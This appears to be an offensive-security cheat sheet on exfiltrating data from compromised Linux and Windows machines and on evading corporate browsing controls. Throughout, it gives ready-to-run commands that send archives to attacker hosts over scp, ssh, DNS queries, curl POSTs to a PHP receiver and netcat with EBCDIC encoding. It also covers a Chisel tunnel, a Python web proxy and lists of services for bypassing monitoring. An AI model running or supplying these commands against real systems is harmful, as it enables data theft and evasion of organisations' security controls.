Data Exfiltration

Secure Copy Protocol (SCP)

Secure Copy Protocol (SCP) is used to transfer files from the compromised system to an external server controlled by the attacker. Using SSH key authentication, encrypted connections are established to move large volumes of data without raising suspicion, as SCP is commonly allowed in environments with remote administration. The traffic appears as legitimate connections, and misconfigured firewall policies can allow this data to exit without further inspection.

scp {file} user@IP:/{directory}

We can also exfiltrate directly with ssh:

tar zcf - /tmp/datafolder | ssh root@<attacker_ip> "cd /tmp; tar zxpf -"

Compress-Archive -Path C:\path\to\datafolder -DestinationPath - | ssh root@<attacker_ip> "cat > /tmp/datafolder.zip"

DNS

DNS exfiltration leverages name resolution traffic to covertly transfer data. This method encapsulates sensitive information within DNS queries and responses, allowing data to travel outside the target network through a channel that is rarely monitored in depth. Using tools such as nslookup, iodine, dnscat2, or custom scripts, data is fragmented and sent as part of DNS requests to a server controlled by the attacker. Because DNS traffic is essential for network connectivity and its inspection is usually superficial, this method allows for effective and difficult-to-detect exfiltration, masquerading as legitimate name resolution traffic.

For example, to do this with nslookup:

nslookup.exe 'secret.data'.attacker-controlled-domain.com

HTTPS Custom Web

Create a web with file upload capabilities and SSL.

updog python module can be used.

HTTP Custom Web

Create a web with file upload capabilities without SSL.

updog, python http.server, apache and others can be used.

Quick exfil using POST method and curl:

On attacker machine:

Make a contact.php file in /tmp/datafolder.base64

<?php file_put_contents('/tmp/datafolder.base64', file_get_contents('php://input')); ?>

On victim machine:

curl --data "$(tar zcf - /tmp/datafolder | base64)" https://<attacker_ip>/contact.php

On attacker machine:

cat /tmp/datafolder.base64 | base64 -d > datafolder.tar && tar xf datafolder.tar

File Sharing and Storage Webs

Web exfiltration can be done using popular online storage and collaboration services, such as repository platforms, cloud storage, or file sharing sites, to transfer sensitive data outside of the controlled environment. This method leverages organizations reliance on legitimate and commonly used services, allowing data traffic to go undetected by masquerading as authorized activity.

Some of this websites include:

• GitHub

• Dropbox

• Pastebinb

• Slack

• Discord

• Imgur

• WeTransfer

• Wormhole

Text via Web Exfiltration

This method uses file upload forms, RESTful APIs, or scripts injected into compromised websites to exfiltrate data directly from the victim's computer to web servers controlled by the attacker. The data can be fragmented and sent in small portions to avoid detection, using encryption or steganography methods to disguise the exfiltrated content. Exfiltration leverages standard HTTP(S) connections, evading detection by proxies and content filtering systems.

Some of this websites include:

• AnonFiles

• Hastebin

• 0bin

• ControlC

• JustPaste.it

• File.io

• Gofile.io

• PrivateBin

Cloud Services

Exfiltration via cloud services, such as Google Drive, OneDrive or Dropbox, uses the APIs of these services to automatically upload files from the compromised machine to an account controlled by the attacker. These services are commonly allowed on enterprise networks and their HTTPS-encrypted traffic makes it easy to evade security controls and outbound data monitoring systems. By disguising the transfer as legitimate synchronization or normal cloud usage, data can be exfiltrated without raising alerts in intrusion detection tools.

Some of this services include:

• Google Drive

• Gmail

• OneDrive

• Yahoo!

• Dropbox

• Outlook

Instant Messaging

This method is based on using messaging services such as Slack, Telegram, or WhatsApp to send files or data directly through bots or automated scripts. These services are usually allowed and used in corporate environments, so their traffic goes unnoticed. In addition, end-to-end encryption and the use of official APIs facilitate data exfiltration without alerting monitoring systems.

Some of this services include:

• WhatsApp

• Telegram

• Signal

• Slack

• Discord

Base64 Encoding

Data exfiltration using Base64 encoding allows an attacker to encode sensitive data in a textual format before sending it over the network, which helps evade detection systems that might flag binary data or certain file types.

The Base64-encoded data can be exfiltrated over HTTP, email, or any other protocol.

Linux/MacOS Base64 Encode:

cat sensitive_data.txt | base64 > encoded_data.txt

Linux/MacOS Base64 Decode:

cat encoded_data.txt | base64 --decode > decoded_data.txt

Windows PowerShell Encode:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\path\to\sensitive_data.txt"))

Windows PowerShell Decode:

[IO.File]::WriteAllBytes("C:\path\to\decoded_data.txt", [Convert]::FromBase64String([IO.File]::ReadAllText("C:\path\to\encoded_data.txt")))

TCP Socket with EBCDIC and Base64

First start Listener:

nc -lvnp 80 > datafolder.tmp

Exfiltrate Data in target Linux machine:

tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic | nc <attackerIP> 80

Exfiltrate Data in target Windows machine:

Compress-Archive -Path C:\temp\datafolder -DestinationPath - | 
[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("C:\temp\datafolder.zip")) |
Out-File C:\temp\encoded_data.txt
# Convert to EBCDIC and send over TCP
Get-Content C:\temp\encoded_data.txt | ForEach-Object { [byte[]][char[]]$_ } | 
Out-File C:\temp\ebcdic_data.txt

type C:\temp\ebcdic_data.txt | nc <attackerIP> 80

dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar

tar xf datafolder.tar

Navigation Policies

Navigation to websites related to cloud storage are usually blocked by organizations.

To evade this policies we can employ the techniques below.

- Browser Extensions

Some of the VPN Extensions that may allow us to bypass navigation policies include:

• Hola VPN

• CyberGhost VPN

• Hide Me

• NordVPN

- HTTP/Socks Proxies

Modern web browsers support HTTP and SOCKS proxies, allowing users to redirect their traffic through intermediary servers.

Some free proxies can be found at https://proxyscrape.com/free-proxy-list.

Once a proxy is obtained, one can access the proxy settings, for example, of the browser, set its IP and port, and access previously restricted sites.

- Web Proxy

A web proxy is a service accessible through a web browser that allows users to access other websites anonymously. It works like a website that is accessed by entering the URL of the desired destination. The web proxy sends the request to the destination site and returns the response to the user, hiding the user's IP address and allowing circumvention of geo-restrictions and censorship.

! A web proxy is used through a browser and a specific website.

! The web proxy is limited to browser web traffic, while the HTTP proxy can handle HTTP traffic from multiple applications.

Some web proxies are as follows:

• proxyium.com

It is difficult to have an up-to-date inventory of all those websites on the Internet that offer this type of service, so you can always find one that works.

In addition, there are open source software products (which allows anyone to make modifications) such as Interstellar (https://github.com/UseInterstellar/Interstellar) or Doge Unblocker (https://github.com/DogeNetwork/v4) that allow users to deploy a Web Proxy type service on their own infrastructure: personal computer, VPS, Cloud, etcetera. Therefore, it is virtually impossible to maintain strict control over the use of this technology within an organization.

Simple custom web proxy in python:

from flask import Flask, request, render_template_string, redirect, url_for
import requests

app = Flask(__name__)

# HTML template with a form to enter the target URL
template = '''
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Web Proxy</title>
</head>
<body>
    <h1>Welcome to Your Web Proxy!</h1>
    <form method="GET" action="/proxy">
        <label for="url">Enter URL to visit:</label><br><br>
        <input type="text" id="url" name="url" placeholder="https://www.example.com" style="width: 300px;"><br><br>
        <input type="submit" value="Go">
    </form>
</body>
</html>
'''

@app.route('/')
def index():
    # Render the input form
    return render_template_string(template)

@app.route('/proxy')
def proxy():
    # Get the URL from the query string
    target_url = request.args.get('url')

    if not target_url:
        return "Error: No URL provided.", 400

    try:
        # Make a GET request to the target URL
        response = requests.get(target_url)
    except requests.exceptions.RequestException as e:
        return f"Error: Unable to connect to {target_url}: {str(e)}", 500

    # Return the content from the target URL to the user
    return response.content

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

- SSH Encapsulation

SSH offers dynamic tunneling functionality, being able to establish an SSH connection to a remote machine and create an encrypted tunnel that acts as a SOCKS proxy.

Once the SSH connection is established, applications on the machine can be configured to make use of the tunnel, which acts as a SOCKS proxy, e.g. the browser can be configured to redirect all traffic through the tunnel.

Ptunnel can also be used: https://github.com/utoni/ptunnel-ng

- WebSockets Encapsulation

WebSockets are a communication protocol that allows a bidirectional and persistent connection between a client and a server over a single TCP connection. Unlike HTTP, which is unidirectional, WebSockets allow the continuous exchange of real-time data without the need to repeatedly establish new connections.

WebSockets are widely used in applications that require real-time communication, such as online chats, social network updates, multiplayer games and financial applications that display live data.

For traffic encapsulation using WebSockets, the Chisel tool (https://github.com/jpillora/chisel) can be used.

First, a Chisel server must be deployed on a VPS. Then, the Chisel client must be used on the victim machine to establish communication with the server side:

Chisel.exe client -v http://example.com:8080 1080:socks

Once the Chisel connection is established, a SOCKS proxy is generated on the selected local port. You can then, for example, configure your web browser to make use of the generated SOCKS proxy.

- Anonymity Networks and Darknets

This section covers networks designed to provide anonymous communication and browsing. These services can be used to bypass company navigation policies by masking user activity and encrypting data traffic.

• Tor Project ( https://www.torproject.org/)

• I2P (https://geti2p.net/en/)

• Freenet/Hyphanet (https://www.hyphanet.org/index.html)

- Virtual Network Interfaces

The use of virtual network interfaces allows the creation of network interfaces that act as if they were physical interfaces, although they are actually running in a virtualized environment.

As an attacker, VMs could be set up on the victim machine in order to circumvent browsing restrictions.

For these cases it is interesting to use software that does not require installation on the corporate computer and does not require administrative privileges to create VMs. An example is QEMU (https://www.qemu.org/download/), in which we can build a Debian Linux.

In NAT mode (default mode), all traffic generated in the virtual machine is as if it were generated on the host (victim computer), so communications are managed in the same way and there is no need to block websites.

On the other hand, in bridge mode, the virtual machine has a (virtual) network interface whose IP address belongs to the same network segment to which the host (corporate computer) is connected. The management of this type of network interfaces internally could be different from how it is done in NAT mode, perhaps evading traffic interception. However, it usually requires administrator privileges.